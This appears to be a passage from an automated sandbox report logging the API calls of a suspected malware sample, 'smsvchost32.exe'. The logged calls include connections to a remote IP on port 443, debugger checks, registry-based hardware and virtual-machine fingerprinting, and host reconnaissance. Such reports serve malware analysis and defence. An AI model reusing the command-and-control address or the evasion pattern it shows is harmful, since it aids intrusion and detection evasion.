| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85669040 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:12 (UTC) |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
3 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Bind | protocol = IPPROTO_IP, local_address = 127.0.0.1, local_port = 402 |
|
1 | |
| Socket | Listen | local_address = 127.0.0.1, local_port = 402, queue_length = 511 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Accept | type = SOCK_STREAM, size = 0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 0, size_out = 85666952 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:12 (UTC) |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Bind | protocol = IPPROTO_IP, local_address = 0.0.0.0, local_port = 49700, hint = OS assigned a local port from the dynamic client port range |
|
1 | |
| Socket | Connect | remote_address = 109.230.199.30, remote_port = 443 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
3 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34272832 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:13 (UTC) |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size_out = 302 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:13 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:14 (UTC) |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size_out = 191 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:14 (UTC) |
|
1 | |
| Environment | Get Environment String | name = debug_tls |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size_out = 335 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
6 | |
| Environment | Get Environment String | name = debug_main |
|
4 | |
| Environment | Get Environment String | name = debug_tls |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
9 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:15 (UTC) |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Bind | protocol = IPPROTO_IP, local_address = 0.0.0.0, local_port = 49700, hint = OS assigned a local port from the dynamic client port range |
|
1 | |
| Socket | Connect | remote_address = 109.230.199.30, remote_port = 443 |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
3 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34272832 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:16 (UTC) |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size_out = 302 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:16 (UTC) |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size_out = 191 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34274288 |
|
1 | |
| Environment | Get Environment String | name = debug_tls |
|
1 | |
| Environment | Get Environment String | name = debug_main |
|
1 | |
| Environment | Get Environment String | name = temp, result_out = C:\Users\Nd9E1FYi\AppData\Local\Temp |
|
2 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ~MHz, data = 172 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1, value_name = ~MHz, data = 172 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2, value_name = ~MHz, data = 172 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3, value_name = ~MHz, data = 172 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3, value_name = ProcessorNameString, data = 73 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Read Value | reg_name = HKEY_PERFORMANCE_DATA, value_name = 2, data = 80 |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\Nd9E1FYi |
|
1 | |
| Environment | Get Environment String | name = COMPUTERNAME, result_out = X2VS1CUM |
|
1 | |
| Environment | Get Environment String | name = SystemDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = SystemRoot, result_out = C:\Windows |
|
1 | |
| Environment | Get Environment String | name = USERDOMAIN, result_out = X2VS1CUM |
|
1 | |
| Environment | Get Environment String | name = USERNAME, result_out = Nd9E1FYi |
|
1 | |
| Environment | Get Environment String | name = USERPROFILE, result_out = C:\Users\Nd9E1FYi |
|
1 | |
| Environment | Get Environment String | name = LOGONSERVER, result_out = \\X2VS1CUM |
|
1 | |
| Environment | Get Environment String | name = TEMP, result_out = C:\Users\Nd9E1FYi\AppData\Local\Temp |
|
1 | |
| DNS | Get Hostname | name_out = x2vS1cum |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, value_name = SystemBiosVersion, data = 0, type = REG_MULTI_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, value_name = SystemBiosVersion, data = 85780768, type = REG_MULTI_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size_out = 33 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 34274252 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Window | Create | - |
|
1 | |
| Environment | Get Environment String | name = debug_net |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size_out = 818 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Debug | Check for Presence | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
|
For performance reasons, the remaining 253 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Thread 0x918
154
44
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = WMA 0 |
|
1 | ||
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
